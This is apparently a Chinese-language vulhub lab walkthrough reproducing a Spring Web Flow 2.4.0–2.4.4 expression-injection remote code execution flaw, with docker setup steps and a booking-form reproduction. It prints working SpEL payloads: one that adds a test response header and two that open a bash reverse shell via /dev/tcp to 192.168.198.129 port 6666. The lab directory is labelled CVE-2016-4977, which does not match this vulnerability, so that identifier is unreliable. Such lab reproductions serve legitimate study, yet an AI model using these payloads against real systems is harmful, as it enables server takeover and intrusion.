漏洞原理
Spring Web Flow (SWF) 是Spring Framework的一个脱离模块, 是一个适用于开发基于流程的应用程序的框架(如购物逻辑),可以将流程的定义和实现流程行为的类和视图分离开来。该漏洞源于在Model的数据绑定上没有指定相关model的具体属性,从而导致恶意的表达式可以通过表单提交并且被执行,导致远程代码执行。
影响版本
Spring Web Flow 2.4.0 - 2.4.4
环境搭建
-
进入靶场
-
cd vulhub/spring/CVE-2016-4977
-
开启靶场
-
docker-compose up -d
-
查看靶场信息
-
docker ps
-
访问网址
-
http://youip:8080
漏洞复现
首先点击访问页面的login进入登入页面
然后用页面左边给出的任意一个账号/密码登入系统
随便点击一家酒店,然后按预定按钮“Book Hotel”,填写相关信息后点击“Process”
然后就可以开始抓包
验证漏洞
执行成功之后会如图所示,在HTTP返回头部中会多出1_Ry字段
- &_T(org.springframework.web.context.request.RequestContextHolder).getRequestAttributes().getResponse().addHeader("1_Ry","True").aaa=n1nty
反弹shell
反弹shell payload,注意里面的反弹shell语句是经过url编码的
- &_T(java.lang.Runtime).getRuntime().exec("/bin/bash+-c+$%40|bash+0+echo+bash+-i+>%26/dev/tcp/192.168.198.129/6666+0>%261")
- &_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/192.168.198.129/6666+0>%261")).start()=test
开启监听,拼接payload提交
关闭镜像
- docker-compose down